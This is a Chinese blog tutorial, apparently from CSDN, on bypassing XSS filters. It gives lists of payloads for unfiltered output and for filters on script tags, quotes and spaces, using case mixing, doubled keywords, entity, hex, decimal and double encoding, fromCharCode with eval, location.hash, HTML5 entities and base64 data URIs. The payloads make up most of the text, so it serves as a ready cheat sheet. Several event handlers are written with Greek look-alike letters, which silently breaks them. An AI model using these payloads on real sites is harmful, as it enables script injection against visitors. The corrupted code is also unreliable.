XSS bypass

最新推荐文章于 2023-05-30 13:58:43 发布
最新推荐文章于 2023-05-30 13:58:43 发布
阅读量1k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84989317
版权

前言

在开始之前,我们先说一说XSS漏洞挖掘思路流程:

思路流程:

1、查找输入点与输出点的位置:
     输入点好找,一般都是URL当中的参数,或者表单内容项等,而输出点一般有以下常见的几种情形:

  • 输出在标签之间,例如:<script>输出</script>
  • 输出在属性之中,例如:<input value="输出" name="keyword">
  • 输出在注释之中,例如://document.getElementById("order_select").value="输出"

2、判断过滤机制过滤了什么内容,例如:关键词(select、alert....)、<、>、"、'等等
3、根据过滤机制构造XSS payload,在构造过程当中应考虑到大小写、HTML实体编码、二次编码、宽字节、反斜线、换行         符、重写关键字、tab键、空格的使用等技巧

下面我们开始讲解在XSS测试当中常见的几种情形以及常用的绕过技巧。

情形 & 绕过技巧

情形1:对传入的参数未经过任何过滤直接输出

在这种情况下我们只需要构造常见的xss payload即可实现xss攻击,例如:

<script>alert(/1/);</script>
<svg/οnlοad=alert(/1/);>
<img src=# οnerrοr="alert(/1/);">
<img src=# οnerrοr="javascript:alert(/1/)">
<a href=# οnmοuseοver=alert(/1/)>test xss</a>
<a href="javascript:alert(/test/)">link</a>
<iframe/οnlοad=alert(/1/);></iframe>

情形2:<script>被过滤
a、采用大小写绕过(这种仅限于未先转换为小写,而直接替换关键字的情形)

<Script>alert(1);</scRipt>

<img sRc=# onError=alErt(1)></img>
<a href=# onMouseover=Alert(1)></a>

b、双写关键词绕过(这一种仅限于将关键字替换为空的情形,而且仅仅替换一次的情形)

<scriscriptpt>alert(/1/);</scscriptript>
<img src=# onerronerroror=alert(1)></img>
 

c、利用HTML实体编码或十六进制绕过

HTML实体字符:

<script>alert(/1/);</script>               <scr&#105;pt>al&#101;rt(/1/);</scri&#112;t>
实体编码对照表:http://www.asciim.cn/
在线辅助工具:https://www.qqxiuzi.cn/bianma/zifushiti.php

十六进制:

<img src=x οnerrοr=alert(/1/);><img>  
<img src=x οnerrοr= &#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x002f;&#x0031;&#x002f;&#x0029;&#x003b;></img>
在线辅助编码工具:https://evilcos.me/lab/xssor/

十进制

<img src=x οnerrοr=alert(/1/);><img>
<img src=x οnerrοr=&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#49;&#47;&#41;&#59; ></img>
在线辅助编码工具:https://evilcos.me/lab/xssor/

 

 

 

 

 

情形3:过滤了引号
a、使用“/”替换引号

<script>alert(/1/);</script>
<svg/οnlοad=alert(/1/);>
<iframe/οnlοad=alert(/1/);></iframe>
<img src=# οnerrοr=alert(/1/);>

b、使用String.fromCharCode

fromCharCode可以对利用代码中的引号进行编码处理,但是需要利用eval函数结合进行使用,例如:

<script>alert(‘insight-labs’)</script>  —–>   <script>eval(String.fromCharCode(97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41))</script>

c、location.hash

将带有引号的内容放在location.hash中,其实这个也可以突破跨站长度的控制

<script>eval(location.hash.slice(1))</script>#alert(‘a’)

情形4:过滤了空格

这种情形可以使用%0d(回车)、%0a(换行)进行替换

<img src=1 οnerrοr=alert(/1/);>      <img%0dsrc=1%0dοnerrοr=alert(/1/);>

 

 

 

 

 

 

 

 

 

 

 

 

 

技巧拓展

1、二次编码

原来的代码:   ’alert(1)’

初步使用HTML字符实体转换成十六进制为:   &#x27;alert(1) &#x27;

思路拓展(活生生的套路):

对&#进行url的编码,二次转换之后代码变成:  %26%23x27alert(1)%26%23x27

2、HTML5姿势

&colon:含义是冒号(:)
&NewLine:含义是回车(Enter)

原代码如下: <a href=javascript:alert(1)>test</a>

通过拓展的HTML5姿势尝试 变成如下所示:

<a href=javasc&NewLine;ript&colon;alert(1)>test<a>

3、base64拓展

<a href=”可控点”>

<iframe src=”可控点”>

在这种情况下如果过滤了<>,’,”,javascript的话使用base64姿势绕过

<a href="data:text/html;base64, PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">test</a>

 

 

 

 

 

 

 

 

FLy_鹏程万里
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xssbypass_XSS易容术---bypass之编码混淆篇+辅助脚本编写
weixin_42377407的博客
12-23 397
一、前言本文原创作者:vk,本文属i春秋原创奖励计划,未经许可禁止转载!很多人对于XSS的了解不深。很多时候,我们的一些关键字被过滤。直接闭合前面payload,插入测试语句,是弹不出窗的。原因有很多,过滤方式也有很多,所以绕过的姿势自然也不少。今天跟大家分享bypass之编码混淆。二、正文1、总括很多时候,我们的一些关键字被过滤。直接闭合前面payload,插入测试语句alert(/xss/),...
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3948
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
XSS Bypass
Grey的博客
07-30 1204
1. XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用...
xssbypass_XSS Bypass
weixin_36463451的博客
12-23 271
如果无法学会绕过,那就只有一个结果:Bypass学习文章来源:米斯特安全团队JS代码往往要在标签内或者在 “On” 事件和 “javascript” 伪协议内才可以执行。标签表达式: 没被安全狗过滤的标签:a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base...
xssbypass_XSS绕过学习
weixin_39573781的博客
01-13 191
1,绕过单引号我们假设管理员在我们的单引号之前放置了一个“\”,有时候双引号之前也会放置,通过一些类似add_slashes的函数可以实现,这个就是转义字符,我们先前的代码就会变成这样:alert(\"XSS\")'>有一些方法可以继续,但是要看过滤的那个函数是怎么放的了。其中一个方法就是使用字符实体,学过html的都知道,就是一些特殊字符会用一些固有的符号组合来表示,举个例子,你不...
xssbypass_xssbypass小记
weixin_33643727的博客
12-23 106
简单整理下bypass的一些点标签外如果是标签之外 又有htmlspecialchars函数的点 就别想了在标签外同时能xss但是有长度限制如果是储存型可以利用多个点 然后构造标签 在中间利用/**/注释掉html代码 一点一点的组合payload除此以外应该是比较短的payload了标签内标签内 有htmlspecialchars函数的点 就看属性包裹是不是用单引号 htmlspecialch...
XSS bypass 绕过
yggcwhat
04-18 373
XSS bypass 绕过
XSS bypass思路及payload
Yty_819109的博客
05-30 644
xss bypass姿势
xssbypass_那些年我们没能bypassxss filter
weixin_29696799的博客
12-23 118
所有的event都是可以执行js:onload onunload onchange onsubmit onreset onselect onbluronfocus onabort onkeydown onkeypress onkeyup onclick ondbclickonmouseover onmousemove onmouseout onmouseup...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它...通过深入研究XSSBypass-master这样的资料,我们可以更好地理解和应对XSS挑战,提高网络环境的安全性。
xss常见的bypass方案
03-06
"XSS常见的bypass方案"指的是绕过网站的安全防护措施,成功实施XSS攻击的策略。以下是一些常见的XSS bypass技巧和方法: 1. **编码与解码**:攻击者可能会尝试使用各种编码方式来逃避过滤机制,如URL编码(%编码)...
xss_bypass_cookbook_4.0.pdf.zip_XSS
09-23
这份"XSS Bypass Cookbook 4.0"很可能是针对XSS过滤机制的破解策略大全,旨在帮助安全研究人员和开发人员更好地理解XSS攻击及其防御方法。 XSS攻击通常分为三种类型:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是...
XSS_Bypass_Cookbook_ver_3.0.pdf
08-07
2 Bypass Chrome XSS Auditor 2.1 字符集问题产生的bypass 2.2 过滤关键字造成的bypass 2.3 协议理解产生的bypass 2.4 标签导致的绕过 2.5 上传swf导致flash-xss所产生的bypass 2.6 crlf产生的bypass 3 各类针对...
WAF的正确bypass
10-20
WAFs设计用于保护网站免受SQL注入、跨站脚本攻击(XSS)、CSRF等常见Web攻击,但有时它们可能会误报或漏报,这时就需要正确地bypass WAF以测试网站的安全性。 ### **一、HTTP数据包认识** 理解HTTP数据包是绕过WAF...
yolo-fastest.zip
07-28
yolo-fastest
mysql安装配置教程.pdf
最新发布
07-28
MySQL的安装配置教程可以细分为以下几个步骤,这里以Windows系统为例进行说明: 一、下载MySQL 1.访问MySQL官网: 1.前往MySQL的官方网站(https://www.mysql.com/)下载MySQL Community Server。 2.选择下载版本: 1.在官网的Downloads页面,选择“MySQL Community (GPL) Downloads”下的“MySQL Installer for Windows”。 2.跳过注册步骤,直接下载MySQL安装包。 二、安装MySQL 1.运行安装包: 1.找到下载好的MySQL安装包文件,双击运行。 2.选择安装类型: 1.在安装向导中,选择安装类型(通常建议选择“Custom”进行自定义安装)。 2.选择操作系统的位数(如64位),并勾选“Enable the Select Features...”等选项(如果提示缺少运行库,需要先安装相应的VC_redist)。 3.设置安装路径: 1.选择MySQL的安装路径和数据存储路径,建议将MySQL安装在非系统盘(如D盘)以避免潜在的问题。 4.设置密码:
基于transformers+pytorch实现非结构化商业文本信息中隐私信息识别python源码(比赛获奖项目).zip
07-28
基于transformers+pytorch实现非结构化商业文本信息中隐私信息识别python源码(比赛获奖项目).zip CCF大数据与计算智能大赛-非结构化商业文本信息中隐私信息识别方案 bert base + flat + crf + fgm + swa + pu learning策略 + clue数据集 = test1单模0.906 词向量:https://github.com/Embedding/Chinese-Word-Vectors SGNS(Mixed-large 综合) loss mask相关代码为pu learning策略的实现 主要模块版本 python 3.6.9 torch 1.1.0 transformers 3.0.2 pytorchcrf 1.2.0 torchcontrib 0.0.2 主要功能点 使用BERT base作为基础模型 采用flat结构进行命名实体识别 使用CRF层进行序列标注 采用对抗训练(FGM)和平滑权重平均(SWA)策略提高模型泛化能力 使用PU learning策略处理标注不全的数据 利用clue数据集进行训练
(verilog)基于MIPS指令集的单周期CPU设计
07-28
相关代码及Vivado项目工程文件
XSS漏洞利用深度解析
"xss利用与挖掘" XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上注入恶意脚本。通过XSS攻击,攻击者能够窃取用户的敏感信息,如cookies,或者控制用户的浏览器行为,例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值